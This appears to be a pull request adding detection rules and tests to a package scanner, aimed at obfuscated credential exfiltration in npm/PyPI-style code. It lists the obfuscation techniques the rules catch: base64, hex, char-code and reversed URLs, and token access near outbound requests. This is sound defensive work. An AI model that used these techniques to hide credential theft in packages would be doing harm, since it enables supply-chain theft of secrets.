feat(scanner): detect obfuscated credential exfiltration

[cybercraftsolutionsllc]

Summary

Adds scanner patterns for obfuscated credential exfiltration in npm/PyPI-style package code.

Detection Rules

• EXFIL_BASE64_URL: detects http:// and https:// exfiltration endpoints hidden with base64 via atob() or Buffer.from(..., "base64").
• EXFIL_HEX_URL: detects http:// and https:// endpoints hidden as hex strings via JavaScript and Python decoding helpers.
• EXFIL_CHARCODE_URL: detects endpoints assembled from JavaScript String.fromCharCode(...) or Python chr(...) chains.
• EXFIL_REVERSED_URL: detects reversed http(s) endpoint literals decoded through split().reverse().join().
• EXFIL_OBFUSCATED_ENV_SEND: detects token/secret environment variable access combined with encoding or obfuscation near outbound sinks like fetch, axios, request, requests.post, urllib3, http(s).request, or sendBeacon.

Tests

Added scanner/src/obfuscated-exfiltration.test.ts with ten cases covering:

• base64 encoded HTTPS URL
• base64 encoded HTTP URL
• JavaScript hex encoded HTTPS URL
• Python hex encoded HTTPS URL
• JavaScript charcode URL construction
• Python chr() URL construction
• reversed HTTPS URL construction
• encoded npm token exfiltration
• encoded GitHub token exfiltration
• benign base64 image data/public config negative case

Validation

cd scanner
npm test

Result: 10 tests passing.

Additional false-positive sanity check:

node --input-type=module -e "<scan scanner/node_modules for new EXFIL_* rule IDs>"

Result: scanned 3,371 dependency JavaScript files with 0 findings from the new rule IDs.

Closes #1.

[vercel]

@patchledgerops-agent is attempting to deploy a commit to the Rapi's projects Team on Vercel.

A member of the Team first needs to authorize it.